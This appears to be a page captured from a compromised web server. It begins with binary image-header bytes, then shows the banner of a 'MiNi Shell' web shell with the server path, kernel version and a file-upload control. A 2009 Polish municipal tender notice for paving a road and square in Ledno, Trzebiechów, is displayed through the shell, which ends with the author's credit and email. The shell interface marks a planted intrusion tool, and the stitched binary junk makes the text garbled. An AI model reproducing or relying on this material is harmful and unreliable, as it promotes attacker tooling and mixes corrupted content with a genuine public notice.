JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090806/269454-N-2009.html

<p class="kh_header"><b>Trzebiechów: Utwardzenie drogi gminnej i placu w m. Ledno gmina Trzebiechów -  GG.3411-2/09</b><br>
<b>Numer ogłoszenia: 269454 - 2009; data zamieszczenia: 06.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Trzebiechów , ul. Sulechowska 2, 66-132 Trzebiechów, woj. lubuskie, tel. 068 3514122, 3514131, faks 068 3514122.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utwardzenie drogi gminnej i placu w m. Ledno gmina Trzebiechów -  GG.3411-2/09.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
Utwardzenie drogi i placu na trenie Gminy Trzebiechów w miejscowości Ledno 

1. Zakres prac obejmuje wykonanie:
  
- utwardzenia drogi gminnej na odcinku 250 mb o szerokości 3 i 3,5m polegającego na wykonaniu nawierzchni z kostki brukowej betonowej koloru szarego gr. 8cm na podsypce cem.-piaskowej, podbudowa z tłucznia. Obramowanie ciągu obrzeżami betonowymi 8x30cm na ławie betonowej z oporem oraz ustawieniu krawężników najazdowych przy zjazdach..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości 2.000 zł, słownie: dwa tysiące 00/100 złotych

Wykonawca powinien wnieść wadium najpóźniej do dnia wyznaczonego jako termin składania ofert, tj. do dn. 27.08.2009r. (dotyczy wpłat na konto) lub do 28.08.2009r do godz. 1000 w pozostałych przypadkach.
 Wadium może być wnoszone w:
   - formie przelewu bankowego na konto: 82 1500 1810 1218 1003 2666 0000
z dopiskiem Wadium - przetarg na utwardzenie drogi gminnej i placu w m. Ledno gmina Trzebiechów; - decyduje data uznania kwoty wadium na rachunku zamawiającego,
 -	gwarancjach ubezpieczeniowych oraz poręczeniach i gwarancjach bankowych (gwarancje muszą być bezwarunkowe i na każde żądanie Zamawiającego)
         -  w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust.3 pkt 4 lit. b 
             ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 
             Przedsiębiorczości (t.j. Dz.U. Z 2007 Nr 42 poz. 275 z późn. zm.),

Oryginał dokumentu (gwarancji, poręczenia itp.) należy złożyć w kasie Urzędu Gminy Trzebiechów ul. Sulechowska 2.
Dowód wniesienia wadium, tj. kopię przelewu lub dokument z potwierdzeniem złożenia oryginału w kasie należy dołączyć do oferty jako załącznik nr 1.

Zamawiający dopuszcza dołączenie do oferty oryginału gwarancji wadium, w sytuacji, gdy wystawiający gwarancję wadium nie wymaga zwrotu jej oryginału po upływie terminu jej ważności.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Do udziału w postępowaniu dopuszcza się Wykonawców, którzy:
  -  posiadają uprawnienia do wykonywania okreś1onej dzia1a1ności lub czynności,
  -  posiadają niezbędną, wiedzę i doświadczenie, posiadają lub dysponują niezbędnym     
     potencjałem technicznym, a także dysponują osobami zdolnymi do wykonywania 
     zamówienia,
     - znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
  - nie pod1egają wykluczeniu z postępowania o udzielenie zamówienia z mocy 
     art. 24 ustawy,
   - zobowiążą się do wykonania przedmiotu zamówienia w terminie do 31.10.2009 r.,
   - udzielą, co najmniej 5- letniej gwarancji na wykonane roboty,
   - zobowiążą się do zawarcia umowy na warunkach okreś1onych w załączonym projekcie umowy,
   - posiadają ubezpieczenie od odpowiedzia1ności cywilnej w zakresie prowadzonej 
     działa1ności na kwotę min. 80 000,00 złotych.
    Ocena spełnienia warunków w postępowaniu o zamówienie publiczne
 W celu dokonania oceny spełnienia warunków, Wykonawcy zobowiązani są wykazać się:
2.1   Uprawnieniami do występowania w obrocie prawnym zgodnie z wymogami ustawy 
        z dn. 19.11.1999 r. prawo działalności gospodarczej (Dz.U. Nr 101 z 1999 r, poz. 1178 z późn. zm.) lub ustawy  z dn. 2 lipca 2004r. o swobodzie działalności     
        gospodarczej (Dz. U Nr 173 poz.1807z późn. zm.)                                - w zał. nr 3
2.2	Obrotami w każdym roku na przestrzeni ostatnich 3 lat (a w przypadku, gdy okres prowadzenia dziala1ności jest krótszy - w tym okresie) w wysokości min. 300.000 zł. 
                                                                                                                           - w zał. nr 6,
2.3 Należytym wykonaniem w ciągu ostatnich 5 lat (a w przypadku, gdy okres prowadzenia  
       działalności jest krótszy - w tym okresie), co najmniej 3 zamówień o podobnym zakresie i  
        porównywalnej złożoności jak w niniejszym postępowaniu,                                - w zał. nr 9,
2.4	Ubezpieczeniem od odpowiedzia1ności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. połowy wartości przedmiotowego zamówienia oszacowanego w ofercie Wykonawcy,                                                     - w zał. nr 11,
2.5. Dysponowaniem niezbędnym sprzętem do realizacji zamówienia; (spycharka, ubijak spalinowy min 200kg, samochód samowyładowczy  ,  równiarka samojezdna, walec statyczny samojezdny)         		                                                                                         - w zał. nr 12.
2.6.  Informacja na temat zatrudnienia
     -  w zał. nr 8..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełnienia przez Wykonawców warunków Zamawiający wymaga, aby oferta zawierała następujące dokumenty załączone i ponumerowane wg podanej  kolejności:
1.1	Formularz oferty,
1.2   zał. nr 2 - oświadczenie o spełnieniu warunków w sprawie udzielenia zamówienia 
                         publicznego - wg załączonego wzoru,
1.3	zał. nr 3 - aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o    wpisaniu do ewidencji działalności gospodarczej, jeż li odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert, a w przypadku podmiotów występujących wspólnie dodatkowo umowę regulującą współpracę tych podmiotów,
1.4	zał. nr 4 - aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, ze uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
1.5	zał. nr 5 - aktualne zaświadczenie z Zakładu Ubezpieczeń Społecznych potwierdzającego odpowiednio, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
1.6   zał. nr 6 - informacje okreś1ające obroty, zysk oraz zobowiązania i należności ogółem z ostatnich 3 lat (a w przypadku, gdy okres prowadzenia działalności jest krótszy - z tego okresu) - wg załączonego wzoru,
1.7   zał. nr 7 - informacja z banku, w którym Wykonawca posiada podstawowy rachunek bankowy, potwierdzająca, że Wykonawca posiada na rachunku wolne środki finansowe i/ lub zdo1ność kredytową w wysokości min. 140 000,00 zł wystawiona nie wcześniej niż 1 miesiąc przed upływem terminu składania ofert,
1.8 zał. nr 8 -  informacja na temat struktury organizacyjnej firmy i zatrudnienia  
                   pracowników, wskazanie osób z odpowiednimi uprawnieniami i należących do  Izby  Inżynierów Budownictwa, które będą pełniły funkcje kierownicze w trakcie realizacji zadania (kierownik budowy, kierownik robót branżowych),
1.9 zał. nr 9 - wykaz zrealizowanych i przekazanych do użytku w ciągu ostatnich 5-ciu lat 
                    (a w przypadku, gdy okres prowadzenia dziala1nosci jest krótszy - w tym 
                    okresie) robót o zakresie i porównywalnej złożoności jak w niniejszym  
                    postępowaniu; remont lub budowa co najmniej  3- wg załączonego  wzoru,
1.10 zał. nr 10 - potwierdzone listy referencyjne do robót wymienionych w zał. nr 11, że roboty zostały wykonane, należycie,
1.11 zał. nr 11 - polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej dziala1ności gospodarczej,
1.12 zał. nr 12 - wykaz sprzętu niezbędnego do realizacji przedmiotu zamówienia; ; (spycharka, ubijak spalinowy min 200kg, samochód samowyładowczy  ,  równiarka samojezdna, walec statyczny samojezdny, piła do cięcia płytek)         		                                                                         - wg załączonego wzoru,
1.13 zał. nr 13 - wykaz podwykonawców przewidzianych do udziału w realizacji przedmiotu zamówienia z okreś1eniem zakresu rzeczowego i udziału finansowego w realizacji zamówienia - wg załączonego wzoru,
1.14 zał. nr 14 - oświadczenia Wykonawcy o cenie, odpowiedzia1nosci, znajomości,       
                    sprawdzeniu i przyjęciu zakresu robot - wg załączonego wzoru,
1.15 zał. nr 15- zaakceptowany wzór umowy,
1.16 zał. nr 16 - kosztorys ofertowy zgodny z przedmiarem robót- należy sporządzić na załączonym druku,
1.17 zał. Nr 17 - dowód wniesienia wadium.


Wszelkie dokumenty załączone do oferty winny być złożone w formie oryginału lub kopii potwierdzonych za zgodność z oryginałami przez upełnomocnionych przedstawicieli Wykonawcy, określonych w dokumencie rejestrowym.
Wskazane jest, aby oświadczenia i dane zawarte w formularzach miały formę zgodną z załączonymi wzorami.
Dokumenty składane w języku obcym muszą być przetłumaczone przez tłumacza przysięgłego na język polski.
Zamawiający w toku dokonywania oceny złożonych ofert, może żądać w wyznaczonym przez siebie terminie, złożenia wyjaśnień dotyczących treści złożonych ofert.

2. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
3) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

3. Dokumenty wymagane w przypadku składania oferty wspólnej
  - umowa regulująca współpracę podmiotów występujących wspólnie,
  - oferta winna zawierać dokumenty dla każdego partnera z osobna, pozostałe dokumenty
     składane są wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.trzebiechow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Trzebiechów
ul. Sulechowska 2
66-132 Trzebiechów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.08.2009 godzina 10:00, miejsce: Oferty należy składać za potwierdzeniem odbioru w:

Urzędzie Gminy Trzebiechów
Trzebiechów ul. Sulechowska 2
w godzinach od 730 do 1530 w sekretariacie.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 27.09.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com